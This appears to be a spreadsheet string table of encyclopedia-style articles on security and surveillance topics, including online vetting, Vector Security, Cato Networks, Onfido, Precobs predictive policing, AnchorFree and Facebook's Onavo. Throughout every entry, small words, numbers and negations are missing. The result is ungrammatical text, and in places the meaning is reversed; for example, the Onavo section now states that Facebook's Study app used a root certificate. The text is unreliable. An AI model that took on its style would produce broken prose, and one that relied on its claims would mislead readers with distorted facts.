they would annoyed nonstop phone calls even recognized others street criticized them. these made face high pressure even suffer mental illness, case material girl $500 examples. references</t>
  </si>
  <si>
    <t>Online vetting</t>
  </si>
  <si>
    <t>online vetting, also known cyber-vetting used potential employers acquaintances people's online presence "internet reputation" ("netrep") search engines google yahoo, social networking services facebook, twitter, instagram linkedin. employers check profiles, posts, photographs indications candidate unsuitable. views practice survey 2007 found half employees would outraged employers looked information social networking sites, thought would unethical. employer surveys found approximately 20-67% employers conduct internet searches, including social networking sites, turned applicants result searches. colleges universities surveyed said looked social networking prospective students, usually applying scholarships limited awards programmes. prospective political appointees obama administration asked list blog posts, emails, text messages, instant messages could suggest conflict interest public source embarrassment, urls sites featured personal professional capacity, online aliases.job applicants refused criticising previous employers discussing company information online, well posting provocative inappropriate photographs, drinking drug use, poor communication skills, making discriminatory comments, lying qualifications. several companies offer online reputation management services, including helping remove embarrassing information websites.in 2017, research findings conducted recruiters listed three primary function cybervetting process: screening process considered analogous conventional background check résumé analysis; efficiency effective gather information candidate conventional process; relational analysis candidate relationship behavior social network posts. legal position legal experts warned human resources departments vetting prospective employees online, possibility discrimination unreliability information. chairman children's charities' coalition internet safety argued 2007 "possibly illegal, certainly unethical". while information commissioner's office advised looking information someone's social networking profiles would illegal, employment specialist noted data protection 1998, processing storing information using make discriminatory decisions could be.age discrimination might result practice, profile users social networking sites. failed candidates able discrimination legislation vetting operations even records check access social networks. vetting using social networking sites risks breaching fair credit reporting (fcra), requires employers gain consent applicants background check, state laws limit consideration off-duty conduct making employment decisions, searches risk breaching prohibitions commercial contained terms service social networking sites.in 2006, trainee teacher high school pennsylvania denied teaching degree supervisor found picture posted myspace captioned "drunken pirate" deemed "unprofessional". sued, arguing acting basis legal out-of-hours behavior millersville university breached first amendment rights, federal district court ruled photograph "protected speech" first amendment. also cyber-stalking digital footprint online identity notes references further reading kennedy, nicole; matt macko. "social networking privacy affects [sic] employment opportunities". convenient invasive information age. boulder, colorado: ethica publishing. davis, donald carrington (2006–2007). "myspace isn't your space: expanding fair credit reporting ensure accountability fairness employer searches online social networking services" (pdf). kansas journal public policy. (2): 237–256. archived original (pdf) 2010-06-26. external links employers employee information 2006 national public radio report</t>
  </si>
  <si>
    <t>Vector Security</t>
  </si>
  <si>
    <t>vector security, inc. fourth largest electronic security company united states. they provide commercial residential electronic mobile security automation solutions, video surveillance, access control, fire intrusion protection across united states canada. through vector security networks, division vector security, inc., also provide managed network services multi-site businesses. corporate office located warrendale, pennsylvania. history vector security, inc. traces roots back philadelphia contributionship (tpc), america's oldest property insurance company founded part benjamin franklin 1752. sister company vector security, established mutual insurance company, policyholders would come together share risk losses fire.in 1970s, westinghouse security division sold westec become franchised network security dealers. eventually, vector security formed acquisition kilbourne security, philadelphia-based westec dealer pittsburgh, pa-based westec dealer. company's first name security changed vector security soon thereafter. vector security began serving customers pennsylvania, eastern ohio northern west virginia.in 1992, vector security began serving national multi-site customers launch national accounts division, expanded canada 1996.in 2012, company underwent re-branding introduced current logo tagline, “intelligent security tailored you.”in august 2013, vector security acquired industry retail group (irg) expand offerings adding managed network services portfolio solutions retailers multisite businesses.in 2015, company acquired pelican security network, inc., regional alliance independent life safety security services providers, expanding footprint along gulf coast southwest florida louisiana dallas/ft. worth, texas.in 2019, vector security acquired nashville-based security, expanding companies' presence north carolina, kentucky florida, adding branch operations vector security alabama, mississippi, georgia, south carolina tennessee. company awards including dealer year magazine (2003, 2015); numerous sammy awards, including installer year (large) magazine (2016). police dispatch quality (pdq) award false alarm reduction association (fara) (2006); central station year central station alarm association (2006); frost sullivan best practices award (2008). operations today vector security, inc. provides commercial home security systems 386,000 customers north america including multi-site businesses. company services products consisting intrusion fire alarms, video surveillance, mobile home automation solutions, access control, electronic article surveillance, robbery/assault notification range loss prevention solutions.additionally, 2013 acquisition industry retail group, (irg) vector security also provider managed infrastructure business intelligence services united states, vector security networks business division.the company based warrendale, pennsylvania serves residential, commercial north american multisite businesses network branch locations authorized dealers. vector security dealers vector security, inc. authorized dealer program. under program, independent dealers offer security system solutions offered vector security branches. these security products services monitored vector security. references external links official website business week: company overview vector security</t>
  </si>
  <si>
    <t>Cato Networks</t>
  </si>
  <si>
    <t>cato networks aviv, israel-based network security company develops secure access service edge (sase) technology, combines enterprise communication security capabilities onto single cloud-based platform. company founded 2015. after october 2021 funding round, company tech unicorn valued $2.5 billion. history cato networks founded 2015 aviv, israel shlomo kramer, co-founder checkpoint imperva, shatz, co-founder networking company incapsula. cato initially funded million series u.s. venture partners aspect ventures. kramer became ceo, shatz became president coo. secured series round million september.the company officially launched february 2016. first products designed protect customer's connections mobile devices services including next-generation firewalling, filtering, application control access.in june 2018, company added threat hunting capabilities networking service.in 2019, company secured million series funding round.in april 2020, company raised million series november, company announced $130 million series funding round, return investors lightspeed partners, participation greylock partners, u.s. venture partners, aspect capital, singaporean fund singtel's subsidiary innov8, hedge fund coatue management. investment reportedly valued company billion, making tech unicorn.in june 2021, company launched version managed detection response (mdr) platform, used detect security threats network. october, company announced raised $200 million $2.5 billion valuation. round lightspeed venture partners participation existing investors greylock, acrew capital, coatue, singtel innov8, kramer.in february 2022, company added cloud access security broker (casb) capabilities protect cloud applications. also february, company announced planning going public within next years. products cato networks develops secure access service edge (sase) platform, combines sd-wan, managed security service global backbone services cloud-based service offering. products designed help staff manage network security distributed workforces accessing resources across wide area networks (wans), cloud internet connects them. company's cato sase cloud platform supports points presence countries. company's managed detection response (mdr) platform combines machine learning artificial intelligence (ai) models process network traffic data identify threats customers. company also offers cloud access security broker (casb) capabilities protect cloud applications. operations company headquartered aviv, israel. february 2022, company reported 1,100 customers served points-of-presence worldwide. also february 2022, company reported employees.shlomo kramer company's ceo, shatz president coo. also edge computing sd-wan secure access service edge references external links www.catonetworks.com</t>
  </si>
  <si>
    <t>CcREL</t>
  </si>
  <si>
    <t>Onion Link</t>
  </si>
  <si>
    <t>Onfido</t>
  </si>
  <si>
    <t>onfido technology company helps businesses verify people's identities using photo-based identity document, selfie artificial intelligence algorithms. founded july 2012 three former students oxford university: cofounder husayn kassai, cofounder eamon jubbawy, chief architect ruhul amin. onfido headquartered london employees offices francisco, albuquerque, york, lisbon, paris, berlin, amsterdam, delhi, mumbai, bangalore singapore. history husayn kassai, eamon jubbawy, ruhul amin first students oxford university. kassai jubbawy co-ran university's oxford entrepreneurs society. point, three entered discussions forming company identified inefficient process getting identity checks completed order secure jobs finance industry. each went check took weeks. idea onfido came solve inefficient process identity checks. they wanted create solution standard moving away manual checks technological solution based machine learning. idea built four aims: help people gain access digital services, protect businesses fraud, create better user experience, uphold user privacy. they decided build technological solution problem secured seed funding £20,000 oxford university's saïd business school, launching onfido august 2012. three secured initial deals around small companies. january 2013, onfido secured first major client, hassle.com.in february 2015, onfido raised $4.5 million series funding round help expand business. april 2016 done almost million identity background checks. recent funding round april 2020 raised $100 million growth.while initially focused identity background checks businesses hiring large numbers permanent staff contractors, september 2016 shifted focus financial services e-commerce companies. these companies required verify identities people business part "know your customer" (kyc) regulations help prevent fraud. onfido helps without onerous identity verifications. company also wants help people currently bank accounts banking system. almost world's adult population excluded opening bank account, often thin credit files, migrants without requisite documents needed in-person verification legally required anti-money laundering checks.in 2019 company 1,500 customers. service onfido (pronounced "on-feed-oh") helps businesses prove users’ real identities online platform. person smartphone built-in camera, onfido able compare cross-reference person's facial biometrics identity document, driver's license. person's identification checked global databases issues. uses manual automated machine learning technologies, including optical character recognition face detection, verify passport card applicant prevent fraud. onfido also conducts right work, sanctions checks using multiple data sources. 2021, company started investing fintech companies seon fraud fighters. accolades 2015, onfido received award inaugural techcities awards thames valley category. 2016, onfido made fintech50 list companies list best businesses. also 2016, kassai, jubbawy, amin appeared forbes' annual under list young leaders across industries onfido.in november 2018, kassai named financial times' list 'top minority ethnic leaders technology.'in august 2019, onfido awarded frost sullivan 2019 technology award advanced hybrid identity verification solution barclays “most innovative technology” supplier award. also 2019, onfido appointed insights 100, voted (out 2,000 companies) fintech ranked fastest growing private company 2019 sunday times tech track 100.in 2020, onfido infosec award best next fraud prevention product conference. references external links official website</t>
  </si>
  <si>
    <t>Anderson's rule (computer science)</t>
  </si>
  <si>
    <t>field computer security, anderson's rule refers principle formulated ross anderson: systems handle sensitive personal information involve trilemma security, functionality scale, choose two. system information many data subjects many people require access hard secure unless functionality severely restricted. rich functionality, restrict number people access, accept information leak. references</t>
  </si>
  <si>
    <t>Precobs</t>
  </si>
  <si>
    <t>precobs predictive policing-software using algorithms knowledge crimes committed past predict commitment so-called "near repeat"-crimes. precobs abbreviation stands crime observation system. developed sold institut musterbasierte prognosetechnik (institute pattern-based prediction technique) ifmpt located oberhausen, germany. concept near repeat-prediction precobs used forecast commitment "near repeat crimes", moment basically burglary prevention. knowledge near repeats bases experience crimes mentioned categories often committed once, several times within close geographical temporal context, so-called spatiotemporal proximity (see also crime contagion models). near repeat crimes typically repeated within hours. apart burglary, crimes street robbery, armed robbery motor vehicle theft.behind concept near repeats stands empirical observation "crime clusters space time". different international studies near repeat burglary revealed patterns geographical temporal connection committed break-ins. highest risk near repeat exists within hours first crime. afterwards, remains approximately month. johnsons bowers concluded analysis burglary data merseyside, "the central conclusion burglary event predictor significantly elevated rates burglary within months within range 300–400 metres burgled home."two approaches explain phenomenon: according "boost hypothesis", past victimization "boosts" probability becoming victim again. argued perpetrator returns place first crime make knowledge area. contrast, "flag hypothesis" refers attractiveness target. perpetrators generally focus attractive targets. application advantages precobs-software based existing knowledge burglaries past. uses so-called "triggers" "anti-triggers" determine probability near repeats. trigger criteria characteristics site crime, crime committed (modus operandi), stolen items date crime. certain trigger criteria fulfilled, system qualifies crime potential near repeat. existence anti-triggers, contrast, prevents system near repeat alerts. this example, intentional breaking window glass. such modus operandi would indicate non-professional background lowers likelihood near repeat significantly. furthermore, past success rates software play important role. software analyses data predicts future crimes geographical radius 250m time window hours days.the forecast depicted contains spatial temporal information. past applications, precobs could reach prediction accuracy around 80%. correspondingly, authorities precobs, deploy staff time-consuming research near repeat crimes burglary series anymore.first, precobs-warning reassessed human police officer. then, authorities information send patrols much specifically prevent expected future crimes. police forces operate undercover observe suspects avoid crimes patrolling relevant areas. precobs warnings subject police internal only. however, data also used inform public areas future crimes expected. police aargau, switzerland, example, uses mobile publish certain precobs warnings. so-called kapo-app provides users push messages speak alerts specific areas villages. kapo-app downloaded everyone.precobs tested first swiss cantons zurich, baselland aargau bavarian cities munich nuremberg. according statements zurich police authority, numbers burglary could reduced compared previous year. similar results could achieved certain areas bavaria, numbers decreased 17.5 42%.on june 2015, bavarian ministry interior, building transport announced permanent predictive policing-software. criticism disadvantages precobs risen different questions concerns. main concerns predictive policing software general hence precobs refers data software needs forecast crimes. since software personal information final decision always police officer, bavarian data security officer qualified precobs unproblematic. however, critics precobs refer possibility enriching near repeat prediction process data deriving internet things social networks. example, 2014 published study suggests real time twitter messages could improve automated crime prediction significantly.other authors believe precobs comparable systems could justification authorities broadly expand collection data.furthermore, critics question reliability data produced predictive policing systems. generally, causal link reduction crime numbers predictive policing software doubted. when tested nuremberg, germany, example, numbers break-ins first decreased typically burglary-intensive autumn, went december. often articulated concerns context authorities might tend rely easily software predictions instead grown experience.moreover, precobs' predictions base assumption crimes committed incidentally possess relevant probability near repeat. accordingly, software forecast burglaries committed professionally acting criminals. hence, scope system limited. system depends data authorities. with regard high dark figure burglaries, systems like precobs might narrow focus authorities much specific area. addition, especially professional criminals could adapt system. knowing authorities predictive policing software, criminals could switch geographical areas adopt specific behavior mislead software. this could finally lead "run" mutual behavior prediction. problem arises, data produced software published like case aargau police app. publication information could alienate population create mood fear. references</t>
  </si>
  <si>
    <t>Omron</t>
  </si>
  <si>
    <t>omron corporation (オムロン株式会社, omuron kabushiki-gaisha), styled omron, japanese electronics company based kyoto, japan. omron established kazuma tateishi (立石一真) 1933 tateishi electric manufacturing company) incorporated 1948. company originated area kyoto called "omuro (御室)"(ja), name "omron" derived. prior 1990, corporation known omron tateishi electronics. during 1980s early 1990s, company motto was: machine work machines, thrill creation". omron's primary business manufacture sale automation components, equipment systems. consumer medical markets, known medical equipment digital thermometers, blood pressure monitors nebulizers. omron developed world's first electronic ticket gate, named ieee milestone 2007, first manufacturers automated teller machines (atm) magnetic stripe card readers.omron oilfield marine provider drive systems custom control systems related industries. omron named thomson reuters global innovators 2013. business divisions products industrial automation: industrial robots, sensors, switches, industrial cameras, safety components, relays, control components, electric power monitoring equipment, power supplies plcs electronic components: relays, switches, connectors, micro sensing devices, mems sensors, image sensing technologies, social systems: access control systems (building entry systems), road management systems, traffic signal controllers, security/surveillance cameras, automated ticket gates, ticket vending machines, fare adjustment machines healthcare: personal use: blood pressure monitors, digital thermometers, body composition monitors, pedometers, nebulizers professional use: blood pressure monitors, non-invasive vascular monitors, portable ecgs, patient monitors other businesses power distribution controls drilling rigs environmental sensors electronic controls automation detention center systems shareholders september 2015: state street bank trust company 505223 japan trustee services bank, ltd.(trust account) bank tokyo-mitsubishi ufj, ltd. (trust account) state street bank trust company 505001 bank kyoto, ltd. master trust bank japan, ltd. (trust account) nippon life insurance company japan trustee services bank, ltd. (trust account bank york, non-treaty jasdec account gallery also motorola 88000 used omron luna88k 4-processor computer arena, browser extended omron yaskawa electric corporation eurion constellation fuzzy logic mems references external links official website</t>
  </si>
  <si>
    <t>AnchorFree</t>
  </si>
  <si>
    <t>anchorfree internet privacy security company provides businesses consumers advanced technologies enable secure private browsing. company's flagship product hotspot shield, popular virtual private network (vpn) service top-grossing productivity apple store. company david gorodyansky, founded firm 2005 together friend eugene malobrodsky. anchorfree headquartered redwood city, california, offices ukraine russia. recent fundraising round 2018 brought $295 million, bringing total funding $358 million. platforms users company works “freemium” model provides free software general features paid version certain enhanced features, virtual server locations, improved speeds, unlimited bandwidth, 24/7 live support. software backed anchorfree's hydra technology.anchorfree's apps available desktops mobile devices using microsoft windows, android operating systems. software downloaded million times. additionally, anchorfree's proprietary technology utilized world's reputable security companies number global telecommunication companies.hotspot shield significant countries internet censored. allows users gain access restricted websites privately securely. firm reported increase egyptian user base 100,000 users million arab spring 2010. during time, program used access social media websites like twitter organize protests. also used tunisia libya arab spring.in 2012, reaching million downloads, company announced raised million financing goldman sachs.since then, anchorfree's user base surpassed million downloads. increase driven part users’ desires protect online major privacy security events like equifax data breach, krack vulnerability, fcc's scrapping neutrality regulations.in 2018, company announced secured $295 million funding wndrco, investment company founded daly, sujay jaswa, jeffrey katzenberg. reviews awards january 2019, techradar gave anchorfree's hotspot shield stars calling “premium users value speed.” reviewer mike williams summarized saying speed priority, turbo-charged performance could justify signing own".in 2019, fast company named anchorfree 13th innovative company world innovative security company.av-test, reputed security auditor, called anchorfree's technology fastest, secure market.the appy awards named hotspot shield best online security/privacy application 2013.forbes magazine, company's written articles, named anchorfree america's sixth promising company 2013.business insider named anchorfree important security startups 2013. critical reception august 2017, center democracy technology issued open complaint federal trade commission state "concerns undisclosed unclear data sharing traffic redirection occurring hotspot shield free considered unfair deceptive trade practices section act." "partnered researchers carnegie mellon university analyze service found 'undisclosed data sharing practices' advertising networks." references external links official website</t>
  </si>
  <si>
    <t>Onavo</t>
  </si>
  <si>
    <t>onavo israeli mobile analytics company owned meta platforms. company primarily performed activities consumer mobile apps, including virtual private network (vpn) service onavo protect, analysed traffic sent provide statistics usage apps. rosen tiger founded onavo 2010. october 2013, onavo acquired facebook, used onavo's analytics platform monitor competitors. this influenced facebook make various business decisions, including 2014 acquisition whatsapp. since acquisition, onavo frequently classified spyware, used monetize application usage data collected within allegedly privacy-focused environment. august 2018, facebook pulled onavo protect store violations apple's policy forbidding apps collecting data usage apps. february 2019, response criticism facebook market research program employing similar techniques (including, particular, targeted towards teens), onavo announced would sunset android version protect well. history onavo founded 2010 tiger rosen.onavo rounds funding: first series investment million magma venture partners sequoia capital 2011. second series investment million magma ventures, sequoia capital, horizons ventures. onavo's sale facebook exits magma venture partners israeli venture capital firms.on october 2013, facebook bought onavo approximately $120 million.the australian competition consumer commission (accc) initiated legal proceedings facebook december 2020, alleging facebook engaged "false, misleading deceptive conduct" using personal data collected onavo "for commercial purposes" contrary onavo's privacy-oriented marketing. facebook responded "always clear information collect used", would defend court. products onavo maintained consumer-oriented utility apps, including onavo count, tracked bandwidth usage apps, well onavo extend onavo protect, services data compression security, respectively.in 2013, company launched onavo insights, mobile analytics platform tracked market share active usage apps using data obtained onavo's consumer apps. august 2017, wall street journal reported since acquisition onavo facebook, data used internally facebook monitor competitors snapchat, well startups performing "unusually well". this data influenced facebook acquire whatsapp 2014, plan video chat rival houseparty 2017. reception initial reception onavo multiple awards 2011. company received first prize mobile beat 2011 conference hosted venturebeat, award innovative 2011 international startup festival, well selected "best mobile startup" next web. privacy concerns february 2018, reported facebook begun include advertising onavo protect within facebook users united states. this denouncements media outlets, classified onavo spyware used facebook monetize usage habits within privacy-focused environment, listing contain prominent disclosure facebook's ownership. app's listings later amended disclaim onavo protect collect information website usage improve facebook products services.in august 2018, facebook pulled onavo protect store pressure apple, declared violation guidelines barring apps harvesting data apps user's device.on february 2019, wake renewed controversy service related facebook research program, facebook announced would sunset onavo protect pull google play store. effective immediately, service ceased collecting personal data. facebook research january 2019, techcrunch published report detailing "project atlas"—an internal market research program employed facebook since 2016. invited users ages install facebook research app—allegedly rebranded version onavo protect—on device, collect data usage, browsing history, search history, location history, personal messages, photos, videos, emails, amazon order history. participants received per-month participate program, promoted teenagers targeted advertising instagram snapchat. facebook research administered third-party beta testing services, including applause betabound, requires users install facebook root certificate phone. ios, prohibited apple's enterprise developer license agreement, methods used intended solely company's employees (for cases internal software specific environment, internal pre-release versions apps). responses facebook initially responded claiming facebook research violate apple's developer license agreement, denied program intended bypass rules banned onavo protect store, intended replace onavo. facebook later announced would discontinue facebook research program ios. facebook research remains available android devices.on january 2019, apple revoked facebook's enterprise developer program certificates, caused company's internal apps (including beta versions public software, well internal apps relating facebook's workplace) become inoperable. apple's public relations team stated "facebook using membership distribute data-collecting consumers, clear breach agreement apple", certificates revoked protect users data". apple reinstated certificates january 31.of particular concern users young allowed participate program. connecticut senator richard blumenthal criticized facebook research, stating "wiretapping teens research, never permissible. this another astonishing example facebook’s complete disregard data privacy eagerness engage anti-competitive behavior." massachusetts senator markey announced would introduce bill strengthen children's online privacy protection (coppa), said inherently manipulative offer teens money exchange personal information younger users don’t clear understanding much data they're handing sensitive is." virginia senator mark warner published open letter mark zuckerberg, declared "working legislation require individualized, informed consent instances behavioral market research conducted large platforms users". facebook study after discontinuing onavo protect facebook research, facebook released market research named facebook study (also known study study facebook) june 2019. access study restricted facebook users least years responded targeted advertisement app. addressing concerns previous incarnations research app, study root certificate conduct data collection. study pays participants paypal. references external links official website</t>
  </si>
  <si>
    <t>Certificate policy</t>
  </si>
  <si>
    <t>certificate policy (cp) document aims state different entities public infrastructure (pki), roles duties. this document published perimeter. when x.509 certificates, specific field include link associated certificate policy. thus, exchange, relying party access assurance level associated certificate, decide level trust certificate. 3647 reference document writing certificate policy december 2010, 3647. proposes framework writing certificate policies certification practice statements (cps). points described based framework presented rfc. main points architecture document describe general architecture related pki, present different entities exchange based certificates issued pki. certificate uses important point certificate policy description authorized prohibited certificate uses. when certificate issued, stated attributes cases intended fulfill. example, certificate issued digital signature e-mail (aka s/mime), encryption data, authentication (e.g. server, uses https) issuance certificates (delegation authority). prohibited uses specified way. naming, identification authentication document also describes certificates names chosen, besides, associated needs identification authentication. when certification application filled, certification authority (or, delegation, registration authority) charge checking information provided applicant, identity. this make sure take part identity theft. generation generation keys also mentioned certificate policy. users allowed generate keys submit generation associated certificate. also choose prohibit user-generated keys, provide separated probably secure generating keys (for example, using hardware security module). procedures different procedures certificate application, issuance, acceptance, renewal, re-key, modification revocation large part document. these procedures describe actor order whole assurance level accepted. operational controls then, chapter found regarding physical procedural controls, audit logging procedures involved ensure data integrity, availability confidentiality. technical controls this part describes technical requirements regarding sizes, protection private keys escrow) various types controls regarding technical environment (computers, network). certificate revocation lists those lists vital part public infrastructure, such, specific chapter dedicated description management associated lists, ensure consistency certificate status content list. audit assessments needs audited ensure complies rules stated documents, certificate policy. procedures used assess compliance described here. other this last chapter tackles remaining points, example pki-associated legal matters. references 3647</t>
  </si>
  <si>
    <t>Certificate in Data Processing</t>
  </si>
  <si>
    <t>certificate data processing (cdp) certification administered data processing management association. required several years experience, recommendation current holder, successful completion 6-part written exam. certification exam originated 1960 1962 auspices data processing management association (dpma), successor national machine accountants association predecessor current association information technology professionals. 1974, exam began administered institute certification computing professionals (iccp) formed nine constituent industry organizations. "awards excellence" consisting certificate given scoring highest exam's five sections.the exam tested individual's knowledge experience hardware, operating systems, telecommunication, systems, programming, data processing areas. failed section, section needed retaken complete certification. initially, hardware, programming sections largely ibm-oriented. mid-1980s, sections included references dec, unix, operating systems, vendors, standards. exam credential later renamed iccp certified computing professional (ccp) existing holders assigned credential. continuing education requirements re-certification part original certification, also added iccp. examinations re-certifications continue administration iccp today.guy steele, wrote filk song making certificate, called song certified data processor. references external links certification</t>
  </si>
  <si>
    <t>Avi Networks</t>
  </si>
  <si>
    <t>networks company provides software delivery enterprise applications data centers clouds. acquired vmware 2019, networks provides application services including local global load balancing, application acceleration, security, application visibility, performance monitoring, service discovery, container networking services. company headquartered santa clara, california r&amp;d, support, engineering, sales offices europe asia. history networks founded 2012 murali basavaiah, ranga rajagopalan, umesh mahajan, guru chahal headquartered santa clara, california. prior networks, founding team spent several years developing data center networking storage solutions cisco systems. networks raised $115 million four rounds venture funding. initial round $12.2 million greylock light speed ventures, second round $20.8 million menlo ventures addition greylock lightspeed third round added ventures investment team. recent round million added cisco systems. current amit pandey, experience successful startups terracotta zenprise. december 2018, networks announced appointment mark anderson executive chairman.on june 2019, vmware announced intent acquire networks.on july 2019 vmware acquired networks. technology networks introduced software-only approach application delivery services central management. vantage platform architecture separates control management plane data plane creating distributed fabric application service delivery points centrally managed. these service delivery points called service engines deliver elastic load balancing, application acceleration, security services per-application basis. service engines also send real-time application telemetry central controller continuously analyzes information deliver application performance, security, end-user insights. software runs bare metal servers, virtual machines, containers data centers, private, public clouds. controller automates provisioning, configuration, scaling services integration vmware vcenter, openstack, controllers, public clouds amazon google cloud platform, openshift ansible, container orchestration platforms kubernetes, docker, mesos. references external links official website</t>
  </si>
  <si>
    <t>Range-R</t>
  </si>
  <si>
    <t>range-r hand-held radar device manufactured communications capable detecting motion solid walls. device operates finely tuned motion detector, using radio waves detect presence people movements small human breathing distance feet more. controversy device source controversy revealed january 2015 u.s. marshals service deployed devices field offices previous years, public disclosure intended purposes. officials stated devices used hostage detection rescue, privacy advocates expressed concern possible fourth amendment abuses enforcement personnel. time, communications estimated sold devices different enforcement agencies within united states. references</t>
  </si>
  <si>
    <t>Certificate Authority Security Council</t>
  </si>
  <si>
    <t>certificate authority security council (casc) multi-vendor industry advocacy group created conduct research, promote internet security standards educate public internet security issues. history group founded february 2013 seven largest certificate authorities, issuers certificates comodo, symantec, trend micro, digicert, entrust, globalsign godaddy. digicert withdrew group june 2018. objectives casc supports efforts ca/browser forum standards-setting bodies. they support development enhancements improve secure sockets layer (ssl) operations certificate authorities (ca).according robin alden, comodo member council, casc serve united front involved: "while standards-setting organization, we’re committed supplementing standards-setting organizations providing education, research, advocacy best practices ssl." membership requirements casc limits membership certificate authorities meet requirements reputation, operation, security. members required undergo annual audit adhere industry standards, ca/browser forum’s baseline requirements network security guidelines. industry initiatives group works collaboratively create define initiatives improve understanding policies impact internet infrastructure. certificate revocation ocsp stapling group's primary focus promoting understanding importance certificate-revocation checking benefits ocsp stapling. protocol intended ensure users aware visit site revoked expired certificate. securing software distribution digital code signing group also worked secure software distribution digital code signing. code signing certificates play role helping users identify authentic software code reputable publishers receive assurance code tampered beforehand. references</t>
  </si>
  <si>
    <t>Online video analytics</t>
  </si>
  <si>
    <t>online video analytics (also known video analytics) measurement, analysis reporting videos viewed online. used purposes understanding consumption patterns (behavioral analysis) optimizing viewing experience (quality service analysis). online video analytics differs traditional television analytics measured using census-based methods instead panel-based metrics. every event viewer watching video online captured analyzed precisely. research done youtube videos suggests that: information given title/description video, less views generate; intensive negative emotion title video, views generate. use-cases metrics interest behavioral usage) analysis study consumption patterns helps video publishers gain insights end-user preferences. these insights used drive monetization placements, tailor future videos maximize viewer engagement. aims answer questions which popular videos? where viewers come from? long viewers watch particular video? take action watching videos (e.g. share, embed, like)? which portion video popular? which placements effective pre-roll, mid-roll post-roll?the following metrics real interest on-demand live videos: unique viewers month on-demand, event show live plays number times video started analyses, beneficial exclude plays less seconds play duration) audience size number viewers watching content given point time play duration time spent consuming videos ratios metrics e.g. plays viewer, play duration play, play duration vieweralong obvious dimensions (like country, browser, device etc.), particularly interesting dimension stream position video portion). measured percentage video length, particular video, plays stream position indicates portion video watched many times. helps analysis viewers drop video watching 25%. behavioral usage) analysis visual analysis tools integrated online video platforms designed transform multiple viewing experiences graphic form, order understand audience optimizing video content performance. graphical summary helps figure viewers engaged specific video called video heatmap. unlike heatmaps used website analytics, highlight different areas page depending click-through rate, video heatmap aggregates stats every viewing session calculates average engagement rate (also known watch rate) throughout entire video. depending platform, video hitmap represented form graph colored timeline. user screen contains personal information related specific viewer, location (country), address, operating system (os), browser version, first last view dates, average engagement. also include information obtained email marketing software used distribute video messages: viewer's email address, first last name. live feed shows overview everyone watching videos publisher real-time mode. feed allows expand detailed viewer stats jump individual user screen. quality experience service) analysis study online video viewer experience helps online video platforms identify shortcomings network infrastructure tweak quality source content better suit end-users' connection speeds devices. this theme deals understanding effect quality usage. after clicking play button, viewers wait video starts playing? interesting metrics theme are: availability percentage times video playback start successfully start time time play button click playback start rebuffers number times duration interruptions re-buffering bitrate average bits second video playback. higher bitrate, better experiencenetwork connection speed among important dimensions. measuring abandonment rate (percentage viewers dropping off) quality (higher start time, higher rebuffering lower bitrate etc.) particular interest. quality experience analysis helps companies determine network infrastructure encoding requirements. references</t>
  </si>
  <si>
    <t>Avigilon</t>
  </si>
  <si>
    <t>avigilon canadian subsidiary motorola solutions, specializes design development video analytics, network video management software, surveillance cameras, access control products. avigilon devices assembled north america facilities located richmond, british columbia, canada, richardson, texas, usa. history avigilon corporation founded 2004 alexander fernandes vancouver, british columbia, canada. avigilon announced first high-definition surveillance system 2006 began selling products 2007. avigilon expanded offerings include broad range high-definition cameras devices suited various environments. company known advanced video analytics, including avigilon appearance search™ unusual motion detection (umd) technologies. 2018 avigilon released avigilon blue™, cloud based video monitoring software. avigilon went public november 2011 toronto stock exchange (tsx).in february 2018 motorola solutions agreed acquire avigilon deal worth c$1.2 billion. acquisition completed march 2018.in february 2021 motorola solutions announced opening u.s. factory richardson, texas video surveillance products several brands, including avigilon, manufactured. opening richardson facility, avigilon-specific facility plano, texas closed. technology network security cameras avigilon develops sells network cameras many applications. cameras typically support advance video analytics detect behavior recognize entities. physical access control video encoders avigilon develops sells video encoders allow traditional analogue cctv cameras become based devices. video monitoring software avigilon develops sells video monitoring software allows communications avigilon third party devices cameras access control units. also video surveillance image sensor professional video closed-circuit television (cctv) closed-circuit television camera video analytics onvif physical security references</t>
  </si>
  <si>
    <t>Centre for Cybersecurity &amp; Cybercrime Investigation</t>
  </si>
  <si>
    <t>university college dublin centre cybersecurity cybercrime investigation (ucd cci) centre research education cybersecurity, cybercrime digital forensic science dublin, ireland.the centre cybersecurity cybercrime investigation established early 2000s, developed collaborative relationships enforcement industry across world. centre cybersecurity cybercrime investigation widely regarded europe's leading centre research education cybersecurity, cybercrime digital forensics. trains specialist officers irish national police service, garda síochána, irish military personnel defence forces, well international enforcement agencies interpol europol, authorities countries. also runs educational qualifications training industry sector multinational corporations. centre's director professor carthy bsc., phd.there memorandum understanding centre cybersecurity cybercrime investigation national cyber security centre (ncsc) dccae, irish government's computer emergency response team. additionally, formal relationships garda síochána, irish defence forces, interpol, europol, visa inc., irish banking federation, well collaborations united nations office drugs crime (unodc), organization security co-operation europe (osce), european anti-fraud office (olaf), microsoft, citibank ebay. also national cyber security centre (ncsc) garda bureau fraud investigation (gbfi) communications information services corps (cis) garda national cyber crime bureau references external links university college dublin (ucd) centre cybersecurity cybercrime investigation (cci)</t>
  </si>
  <si>
    <t>Aware, Inc.</t>
  </si>
  <si>
    <t>aware, inc. (nasdaq:awre) biometrics software services company based near boston, massachusetts. history aware incorporated 1986 cambridge, massachusetts time envisioned founders "mathematical engineering company".aware went public 1996 commercialize products intellectual property, time also established business supplying biometrics software enforcement applications.between 2009 2012, aware divested several assets unrelated current business.as 2019, aware focused exclusively providing biometrics software services. products apply fingerprint recognition, face recognition, iris recognition, speaker recognition applications including multi-factor authentication biometric identification. references external links company website patents assignee aware, inc.</t>
  </si>
  <si>
    <t>Awareness Technologies</t>
  </si>
  <si>
    <t>awareness technologies awareness technology westport, connecticut-based american technology company founded 2002. company provides security, monitoring, forensic, data loss prevention, productivity analytics solutions home, office, enterprise. history company founded 2002 angeles, california mike osborn penna. originally, company developed technology monitored electronic transmissions uses counter-terrorism.in 2010 group headed brad miller (former perimeter esecurity) first england capital invested $6.5 million. 2012, company headquarters relocated marina rey, california westport, connecticut. 2014 awareness technologies joined alliance credit union national association part "cuna strategic services."in 2016, company acquired mobile parental control screen time management firm screen time labs, based bristol, united kingdom.on june 2019, awareness technologies acquired veriato, formerly spectorsoft, technology company established insider risk industry late 1990s.on december 2020, group acquired awareness technologies. conjunction acquisition, announced appointment elizabeth harz company's ceo. brands veriato employee monitoring insider risk detection enterprise organizations. interguard cloud-hosted employee productivity management solutions.screentime screen time management tools parents, available android, apple ios, amazon mobile devices. webwatcher parental monitoring tools. awards distinctions webwatcher received magazine editors' choice award 2011 review parental control monitoring software. also, about.com readers named webwatcher "best internet safety tool" part 2011 readers' choice awards.screentime parental control received 2019 national parenting product award.veriato seven 